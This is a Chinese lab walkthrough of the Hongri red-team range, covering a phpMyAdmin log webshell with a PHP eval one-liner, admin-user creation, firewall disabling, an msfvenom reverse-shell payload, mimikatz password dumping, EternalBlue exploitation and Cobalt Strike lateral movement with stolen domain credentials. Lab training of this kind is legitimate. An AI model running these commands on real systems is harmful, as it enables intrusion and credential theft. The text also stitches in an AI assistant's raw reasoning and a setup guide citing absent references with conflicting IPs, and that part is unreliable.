红日靶场环境搭建详细步骤

一:环境搭建#

1、下载好镜像文件。

img

2、直接vmware启动即可。

这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)

img

设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)

img

设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)

img

这样win10就可以访问win7,但不能直接访问win08和win2k3。

三台靶机的初始密码都是hongrisec@2019 ,初次登录需要改密码。

进入win7,开启web服务。

img

二:渗透过程:#

信息收集#

1、简单地扫描下一win7端口

img

2、访问80端口是一个phpstudy探针,扫描一下目录,发现一个phpmyadmin目录和beifen.rar文件。

phpmyadmin#

直接root/root就可以进入。

直接写马不行,版本高,用mysql日志写shell就行,绝对路径在探针上有显示。

Snipaste_2021-07-20_15-11-05

set global general_log = "ON";

Snipaste_2021-07-20_15-11-28

Snipaste_2021-07-20_15-11-51

set global general_log_file = "C:/phpStudy/www/test.php";

Snipaste_2021-07-20_15-12-10

Snipaste_2021-07-20_15-13-57

SELECT '<?php eval($_POST["attack"]);?>'

4、使用antsword连接一下。

Snipaste_2021-07-20_15-20-06

Snipaste_2021-07-20_15-20-14

加用户

Snipaste_2021-07-20_15-24-05

net user 账户 密码 /add
管理员权限,所有直接加
net localgroup administrators admin /add

关防火墙

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

Snipaste_2021-07-20_20-56-51

其它姿势#

参考:https://blog.csdn.net/qq_41821603/article/details/109948920

三:后渗透#

关防火墙#

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

Snipaste_2021-07-20_20-56-51

msf链接#

antsword执行以下命令,msf上线一下

msfvenom -p windows/meterpreter_reverse_tcp LHOST=ip  LPORT=4444 -f exe -o shell.exe

Snipaste_2021-07-20_15-57-38

use exploit/mutli/handler 
​
set payload windows/x64/meterpreter/reverse_tcp 
​
set lhost ip
​
set lport 4444
​
exploit -j(后台)允许

Snipaste_2021-07-20_16-00-45

蚁剑上传木马,获取sessions

Snipaste_2021-07-20_16-00-29

查看信息#

Snipaste_2021-07-20_16-09-08

迁移进程#

一般是explorer.exe

Snipaste_2021-07-20_16-09-23

migrate pid

Snipaste_2021-07-20_16-09-45

mimikatz抓密码#

load mimikatz 加载mimikatz 模块,然后wdigest 查看明文密码,成功获取

Snipaste_2021-07-20_16-09-53

Snipaste_2021-07-20_16-10-04

Snipaste_2021-07-20_17-35-39

关于msf cmd交互#
execute -f cmd.exe -i -t

Snipaste_2021-07-20_16-57-55

关于乱码#

用chcp 65001解决

Snipaste_2021-07-20_16-58-02

开启3389#
run post/windows/manage/enable_rdp
rdesktop ip:3389
域环境#
net config workstation  查看是否有域,以及当前登录域
net view 查看域内主机列表
查看域控:
net group "domain controllers" /domain 查看域控制器(如果有多台)
net user /domain 查看域内所有域用户 
net group "domain admins" /domain 查看域管理员列表

Snipaste_2021-07-20_16-45-09

域名为 god
域中有三台主机:
stu1.god.org   
root-tvi862ubeh.god.org   
owa.god.org   为域控
域用户有 : ligang  , liukaifeng01 ,administrator
域管理员只有一个:  administrator
其实直接就拿到域管理员了

四:横向渗透#

msf+proxychains#

先进入sessions

run autoroute -s 192.168.52.0/24
或者
run post/multi/manage/autoroute
设置proxychains代理
use auxiliary/server/socks4a 
set srvport 1080
set srvhost 127.0.0.1
run

Snipaste_2021-07-20_21-53-38

然后vim /etc/proxychains.conf 修改proxychains 配置为:

在这里插入图片描述

即可通过代理扫描,发现扫描不成功,

百度发现可以这样,拿msf的直接代理扫。发现很慢,

Snipaste_2021-07-20_21-58-42

前提:拿下边界机之后,进入内网,想用nmap怎么办? CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp协议,要使用-Pn不使用ICMP的ping确认主机存活

win2008#

解决问题,直接挂代理扫

Snipaste_2021-07-20_21-19-41

结果,发现445

Snipaste_2021-07-20_22-00-39

扫描ms17-010

search ms17-010 
use auxiliary/scanner/smb/smb_ms17_010 
set rhost 10.37.129.7 
run

Snipaste_2021-07-20_22-16-13

注意lhost是跳板机的ip

use exploit/windows/smb/ms17_010_eternalblue
​
set payload windows/x64/meterpreter/reverse_tcp
​
set lport 5555
​
set lhost 192.168.52.143
​
set rhosts 192.168.52.138
​
exploit

Snipaste_2021-07-20_22-20-40

Snipaste_2021-07-20_22-23-20

win2003#

Snipaste_2021-07-21_09-21-01

另一台windows2003也开了445,发现只有

exploit/windows/smb/ms17_010_psexec

或者

auxiliary/admin/smb/ms17_010_command

一句话一句话的添加用户

能用,这里用第二个

扫管道

use auxiliary/scanner/smb/pipe_auditor

Snipaste_2021-07-21_09-51-00

use exploit/windows/smb/ms17_010_psexec

Snipaste_2021-07-21_09-54-23

设置管道

Snipaste_2021-07-21_10-13-17

set payload windows/meterpreter/bind_tcp

Snipaste_2021-07-21_09-59-23

Snipaste_2021-07-21_09-59-30

关于ipc$

https://blog.csdn.net/weixin_33969116/article/details/91833739?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.control&spm=1001.2101.3001.4242

https://blog.csdn.net/qq_41891666/article/details/107598979

空连接需要口令用户名为空

https://zhuanlan.zhihu.com/p/43643596

最后需要用户点击

Snipaste_2021-07-21_10-38-13

CS#

webshell反弹shellcscs创建Listenerpayload选择beacon http

然后攻击 -> 生成后门 -> Windows Executable(S),选择刚创建的 Listener

启动

./cobaltstrike
​
./teamserver 192.168.85.128(ip,不能0.0.0.0 ,127.0.0.1) admin(密码)

Snipaste_2021-07-21_10-49-47

Snipaste_2021-07-21_10-50-50

设置监听

Snipaste_2021-07-21_14-13-02

Snipaste_2021-07-21_14-12-43

生成exe

Snipaste_2021-07-21_14-14-27

Snipaste_2021-07-21_14-13-39

目标主机信息收集#

拿到 shell 第一步,调低心跳值,默认心跳为 60s,执行命令的响应很慢

我这是自己的内网且没有杀软我就设置为 0 了,真实环境不要设置这么低

进入 beacon 执行 sleep 0,然后查看下基本的本机信息:

whoami`、`hostname`、`net user`、`net localgroup administrators

众所周知 systeminfo 可以查看系统详细信息,我就不展示,提供两个小 tips:

查看是什么操作系统 & 系统版本: 系统中文:systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 系统英文:systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 查询系统体系架构:echo % PROCESSOR_ARCHITECTURE%

查询已安装的软件及版本信息:wmic product get name,version

win10 中,输入 wmic /? 会提示 wmic 已弃用,但在 server2012R2win7 等版本中可以正常使用

powershell 中可替代该命令的是 Get-WmiObject:

Get-WmiObject -class win32_product | Select-Object -property name,version

查询进程及服务: tasklist,默认显示映像名称,PID,会话名,会话,内存使用

默认显示映像名称,PID,服务

wmic process list brief

常见的杀软进程:

进程名软件
360sd.exe360 杀毒
360tray.exe360 实时保护
ZhuDongFangYu.exe360 主动防御
KSafeTray.exe金山卫士
SafeDogUpdateCenter.exe安全狗
McAfeeMcShield.exe
egui.exeNOD32
AVP.exe卡巴斯基
avguard.exe小红伞
bdagent.exeBitDefender
横向探测#

获取到一个 cs beacon 后可以目标内网情况和端口开放情况

beacon 上右键 -> 目标 -> 选择 net view 或者 port scan:

Snipaste_2021-07-21_13-40-15

执行后可以在 Targets 选项卡看到扫描出来的主机:

Snipaste_2021-07-21_13-50-23

cs hashdump 读内存密码:hashdump,用 mimikatz 读注册表密码:logonpasswords

Snipaste_2021-07-21_13-40-28

Snipaste_2021-07-21_13-41-05

在凭证信息一栏可以清楚查看:

如果权限不够可以提权,提权插件:ElevateKit

额外增加 ms14-058ms15-051ms16-016uac-schtasks 四种提权方式

抓取密码后可以先探测内网其他主机:

ping 方法:

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.72.%I | findstr "TTL="

Snipaste_2021-07-21_13-46-34

最简单的直接 arp -a 查看也可以,这里还推荐一个好用工具 Ladon

Ladon作者是 k8gege,它是一个大型内网渗透扫描器并且支持 cs 脚本形式

cs 要使用的话只需要下载其中的 Ladon.exe Ladon.cna 即可运行基本功能

详细功能参考官方 wiki官方说明文档

扫描网段内存活主机信息:Ladon 192.168.72.0/24 OsScan

Ladon` 还有很多使用功能,比如扫描 `MS17-010`:`Ladon 192.168.72.0/24 MS17010

其他的功能可以自己去尝试

域探测差不多了还可以使用 BloodHound这款域渗透分析工具来分析攻击路径

BloodHound 介绍:

BloodHound 是一种单页的 JavaScript 的 Web 应用程序,构建在 Linkurious 上,用 Electron 编译,NEO4J 数据库 PowerShell/C# ingestor.BloodHound 使用可视化图来显示 Active Directory 环境中隐藏的和相关联的主机内容。攻击者可以使用 BloodHound 轻松识别高度复杂的攻击路径,否则很难快速识别。防御者可以使用 BloodHound 来识别和防御那些相同的攻击路径。蓝队和红队都可以使用 BloodHound 轻松深入了解 Active Directory 环境中的权限关系。

横向移动#

这里有很多种方式,可以:

  1. cs 上开通 socks 通道,在攻击机上用 proxychains 将攻击机的 msf 代入内网,但是 cs 的 socks 代理不稳定
  2. ew 添加转接隧道,在攻击机上用 proxychains 将攻击机的 msf 代入内网
  3. cs 派生到 msf,msf 使用 socks4a 代理进内网,但是并不稳定
  4. cs 派生到 msf,msf 使用使用 autoroute 添加路由进内网
  5. 用 frp 创建 socks5 代理
SMB Beacon#

另外这里还要介绍下 cs 派生 SMB Beacon

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效

简单来说,SMB Beacon 有两种方式

第一种直接派生一个孩子,目的为了进一步盗取内网主机的 hash

新建一个 Listenerpayload 设置为 Beacon SMB

Snipaste_2021-07-21_13-50-29

我用的是 4.0 版本,之前的 3.14 版本和这个可能会有微小差异

在已有的 Beacon上右键 Spawn(生成会话 / 派生),选择创建的 smb beacon listerner:

选择后会反弹一个子会话,在 external ip 后面会有一个链接的小图标:

Snipaste_2021-07-21_13-50-44

这就是派生的 SMB Beacon,当前没有连接

可以在主 Beacon 上用 link host 连接它,或者 unlink host 断开它

第二种在已有的 beacon 上创建监听,用来作为跳板进行内网穿透

前提是能够通过 shell 之类访问到内网其他主机

psexec 使用凭证登录其他主机#

前面横向探测已经获取到内网内的其他 Targets 以及读取到的凭证信息

于是可以尝试使用 psexec 模块登录其他主机

右键选择一台非域控主机 ROOT-TVI862UBEH psexec 模块:

Snipaste_2021-07-21_13-53-49

在弹出的窗口中选择使用 god.org Administrator 的凭证信息

监听器选择刚才创建的 smb beacon,会话也选择对应的 smb beacon 的会话:

Snipaste_2021-07-21_14-24-25

执行后效果如下:

Snipaste_2021-07-21_13-58-49

可以看到分别执行了

rev2self
make_token GOD.ORG\Administrator hongrisec@2020
jump psexec ROOT-TVI862UBEH smb

这几条命令,执行后得到了 ROOT-TVI862UBEH 这台主机的 beacon

如法炮制得到了域控主机 OWA beacon:

Snipaste_2021-07-21_14-01-55

最终的图标视图如图所示:

Snipaste_2021-07-21_14-02-11

token 窃取#

除了直接使用获取到的 hash 值,也可以直接窃取 GOD\Administrator token 来登录其他主机

选择 beacon 右键 -> 目标 -> 进程列表

选择 GOD\Administrator token 盗取:

Snipaste_2021-07-21_14-28-55

然后在选择令牌处勾选使用当前 token 即可:

Snipaste_2021-07-21_14-29-17

效果和前面是一样的

Snipaste_2021-07-21_13-53-49

<think>好的,用户想了解如何搭建红日靶场环境,需要教程和配置指南。我需要根据提供的引用信息来整理步骤。首先,引用[1]和[2]提到了红日靶场的官网和配置说明,应该从这里获取官方资料。引用[3]中的内容详细描述了靶场搭建的拓扑图、网络配置,以及外网打点的步骤,比如nmap扫描、目录扫描、利用phpmyadmin日志getshell等。引用[4]提供了一个超详细的操作指南,适合新手,可能包含具体的虚拟机设置和权限配置,比如关闭Win7防火墙、黄金票据的制作问题。此外,用户可能需要知道环境搭建后的内网攻击步骤,如ms17_010漏洞扫描和利用。 需要注意的是,引用[3]中的目录结构可能对应不同的阶段,比如外网渗透、内网信息搜集、横向移动等,但用户现在需要的是环境搭建部分。所以应该聚焦在拓扑图配置、网络设置、虚拟机安装等方面。引用[4]提到制作黄金票据后访问域控的问题,虽然属于后期渗透测试的内容,但环境搭建时需要正确配置域控权限和网络策略,避免出现访问问题。 另外,用户可能对虚拟机软件的选择(如VMware或VirtualBox)、镜像导入、网络适配器配置(如NAT、仅主机模式)有疑问,需要详细说明。引用[3]中的“配置网络”可能涉及设置多个虚拟机的IP地址,确保它们在同一子网内,并正确隔离内外网环境。可能还需要关闭防火墙(如Win7防火墙)以便测试,如引用[4]所述。 需要提醒用户注意版权问题,确保从官网下载资源,避免使用非官方镜像。同时,步骤中可能涉及复杂的内网渗透配置,建议分阶段验证,例如先确保各虚拟机互通,再测试外网到内网的连通性。可能遇到的常见问题包括网络不通、服务未启动、权限配置错误等,需提供排查方法,比如检查IP设置、服务状态、防火墙规则等。 最后,根据引用[5],可能有培训课程提供更深入的指导,但用户目前只需基础搭建步骤。因此,回答应结构清晰,分步骤说明,并附上相关引用来源,确保信息可靠。需要检查是否有遗漏的关键点,如虚拟机快照管理、必要的软件安装(如phpMyAdmin、XSS平台等),以及后续测试的基本流程概述,帮助用户搭建后验证环境是否成功。</think>### 红日靶场环境搭建指南 #### 1. **环境准备** - **官网资源下载** 访问红日靶场官网[^2]获取镜像文件(如Windows Server、Win7等虚拟机镜像)及拓扑图。建议使用VMware Workstation或VirtualBox作为虚拟化平台。 - **网络拓扑理解** 根据引用[3]中的靶场拓扑图,配置内外网隔离环境。典型结构包含外网WEB服务器、内网域控服务器(DC)和多个内网主机,需设置NAT和仅主机模式网卡实现网络分层。 #### 2. **虚拟机配置** - **镜像导入与网络适配** 将下载的OVA/OVF镜像导入虚拟机软件,为每台虚拟机分配网络适配器: - **WEB服务器**:外网网卡(NAT模式) + 内网网卡(仅主机模式) - **内网主机(如Win7)**:仅主机模式网卡 - **域控服务器(DC)**:仅主机模式网卡 - **IP地址设置** 根据拓扑图手动配置静态IP,确保内外网互通。例如: - WEB服务器外网IP:`192.168.1.100`,内网IP:`10.10.10.2` - 域控服务器IP:`10.10.10.1` - Win7主机IP:`10.10.10.3` #### 3. **服务与权限配置** - **关闭防火墙** 在Win7和域控服务器中关闭系统防火墙(引用[4]),避免拦截测试流量: ```cmd netsh advfirewall set allprofiles state off ``` - **域环境搭建** 在域控服务器安装Active Directory服务,创建测试域(如`test.local`),将Win7主机加入域。确保域账户权限正常,用于后续黄金票据测试[^4]。 #### 4. **漏洞环境验证** - **外网渗透测试** 使用Kali Linux对WEB服务器进行扫描(引用[3]): ```bash nmap -sV 192.168.1.100 dirsearch -u http://192.168.1.100 -e php,asp ``` - **内网连通性检查** 从WEB服务器通过内网IP访问域控共享目录,验证网络隔离是否生效: ```cmd dir \\10.10.10.1\C$ ``` #### 5. **常见问题解决** - **网络不通** 检查虚拟机网卡模式、IP地址是否冲突,确保网关和DNS设置正确。 - **权限访问失败** 若黄金票据制作后仍无法访问域控(引用[4]),需检查Kerberos票据有效期、系统时间同步及SPN配置。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值